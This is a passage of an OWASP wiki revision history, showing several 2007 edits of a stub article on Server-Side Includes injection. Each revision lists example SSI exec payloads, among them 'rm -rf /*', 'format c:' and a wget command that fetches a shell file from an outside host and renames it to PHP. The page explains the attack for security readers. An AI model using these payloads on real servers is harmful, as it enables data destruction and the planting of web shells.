Remove All - <font color='red'>< !--#exec cmd="format c:" --></font><br><br />
Navigate Directories - <font color='red'>< !--#exec cmd="cd C:\admin\dir" --></font><br><br />
<br />
==Related Threats==<br />
Remote Command Execution<br><br />
Local File Inclusion<br />
<br />
==Related Attacks==<br />
<br />
==Related Vulnerabilities==<br />
<br />
==Related Countermeasures==<br />
<br />
==Categories==<br />
<br />
{{Template:Stub}}<br />
<br />
[[Category:Injection Attack]]</div>Ethernethttps://wiki.owasp.org/index.php?title=Server-Side_Includes_(SSI)_Injection&diff=18277Server-Side Includes (SSI) Injection2007-04-29T19:21:47Z<p>Ethernet: /* Examples */</p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
SSI can be injected in to input fields where code is echo'd out and attackers are able to execute commands.<br />
<br />
==Examples ==<br />
'''Linux'''<br><br />
List Files - <font color='red'>< !--#exec cmd="ls" --></font><br><br />
Remove All - <font color='red'>< !--#exec cmd="rm -rf /*" --></font><br><br />
Navigate Directories - <font color='red'>< !--#exec cmd="cd /root/dir/" --><</font>br><br />
Plant Shell - <font color='red'>< !--#exec cmd="wget http://mysite.com/shell.txt | rename shell.txt shell.php" --></font><br><br />
<br><br />
'''Windows'''<br><br />
List Files - <font color='red'>< !--#exec cmd="dir" --></font><br><br />
Remove All - <font color='red'>< !--#exec cmd="format c:" --></font><br><br />
Navigate Directories - <font color='red'>< !--#exec cmd="cd C:\admin\dir" --></font><br><br />
<br />
==Related Threats==<br />
<br />
==Related Attacks==<br />
<br />
==Related Vulnerabilities==<br />
<br />
==Related Countermeasures==<br />
<br />
==Categories==<br />
<br />
{{Template:Stub}}<br />
<br />
[[Category:Injection Attack]]</div>Ethernethttps://wiki.owasp.org/index.php?title=Server-Side_Includes_(SSI)_Injection&diff=18276Server-Side Includes (SSI) Injection2007-04-29T19:21:00Z<p>Ethernet: /* Examples */</p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
SSI can be injected in to input fields where code is echo'd out and attackers are able to execute commands.<br />
<br />
==Examples ==<br />
'''Linux'''<br><br />
List Files - font color='red'>< !--#exec cmd="ls" --></font><br><br />
Remove All - font color='red'>< !--#exec cmd="rm -rf /*" --></font><br><br />
Navigate Directories - font color='red'>< !--#exec cmd="cd /root/dir/" --><</font>br><br />
Plant Shell - font color='red'>< !--#exec cmd="wget http://mysite.com/shell.txt | rename shell.txt shell.php" --></font><br><br />
<br><br />
'''Windows'''<br><br />
List Files - font color='red'>< !--#exec cmd="dir" --></font><br><br />
Remove All - font color='red'>< !--#exec cmd="format c:" --></font><br><br />
Navigate Directories - <font color='red'>< !--#exec cmd="cd C:\admin\dir" --></font><br><br />
<br />
==Related Threats==<br />
<br />
==Related Attacks==<br />
<br />
==Related Vulnerabilities==<br />
<br />
==Related Countermeasures==<br />
<br />
==Categories==<br />
<br />
{{Template:Stub}}<br />
<br />
[[Category:Injection Attack]]</div>Ethernethttps://wiki.owasp.org/index.php?title=Server-Side_Includes_(SSI)_Injection&diff=18275Server-Side Includes (SSI) Injection2007-04-29T19:20:11Z<p>Ethernet: /* Examples */</p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
SSI can be injected in to input fields where code is echo'd out and attackers are able to execute commands.<br />
<br />
==Examples ==<br />
'''Linux'''<br><br />
List Files - < !--#exec cmd="ls" --><br><br />
Remove All - < !--#exec cmd="rm -rf /*" --><br><br />
Navigate Directories - < !--#exec cmd="cd /root/dir/" --><br><br />
Plant Shell - < !--#exec cmd="wget http://mysite.com/shell.txt | rename shell.txt shell.php" --><br><br />
<br><br />
'''Windows'''<br><br />
List Files - < !--#exec cmd="dir" --><br><br />
Remove All - < !--#exec cmd="format c:" --><br><br />
Navigate Directories - < !--#exec cmd="cd C:\admin\dir" --><br><br />
<br />
==Related Threats==<br />
<br />
==Related Attacks==<br />
<br />
==Related Vulnerabilities==<br />
<br />
==Related Countermeasures==<br />
<br />
==Categories==<br />
<br />
{{Template:Stub}}<br />
<br />
[[Category:Injection Attack]]</div>Ethernethttps://wiki.owasp.org/index.php?title=Server-Side_Includes_(SSI)_Injection&diff=18274Server-Side Includes (SSI) Injection2007-04-29T19:19:31Z<p>Ethernet: /* Examples */</p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
SSI can be injected in to input fields where code is echo'd out and attackers are able to execute commands.<br />
<br />
==Examples ==<br />
'''Linux'''<br />
List Files - <!--#exec cmd="ls" --><br />
Remove All - <!--#exec cmd="rm -rf /*" --><br />
Navigate Directories - <!--#exec cmd="cd /root/dir/" --><br />
Plant Shell - <!--#exec cmd="wget http://mysite.com/shell.txt | rename shell.txt shell.php" --><br />
<br />
'''Windows'''<br />
List Files - <!--#exec cmd="dir" --><br />
Remove All - <!--#exec cmd="format c:" --><br />
Navigate Directories - <!--#exec cmd="cd C:\admin\dir" --><br />
<br />
==Related Threats==<br />
<br />
==Related Attacks==<br />
<br />
==Related Vulnerabilities==<br />
<br />
==Related Countermeasures==<br />
<br />
==Categories==<br />
<br />
{{Template:Stub}}<br />
<br />
[[Category:Injection Attack]]</div>Ethernethttps://wiki.owasp.org/index.php?title=Server-Side_Includes_(SSI)_Injection&diff=18273Server-Side Includes (SSI) Injection2007-04-29T19:16:39Z<p>Ethernet: /* Description */</p>
<hr />
<div>{{Template:Attack}}<br />
<br />
==Description==<br />
SSI can be injected in to input fields where code is echo'd out and attackers are able to execute commands.<br />
<br />
==Examples ==<br />
<br />
==Related Threats==<br />
<br />
==Related Attacks==<br />
<br />
==Related Vulnerabilities==<br />
<br />
==Related Countermeasures==<br />
<br />
==Categories==<br />
<br />
{{Template:Stub}}<br />
<br />
[[Category:Injection Attack]]</div>Ethernet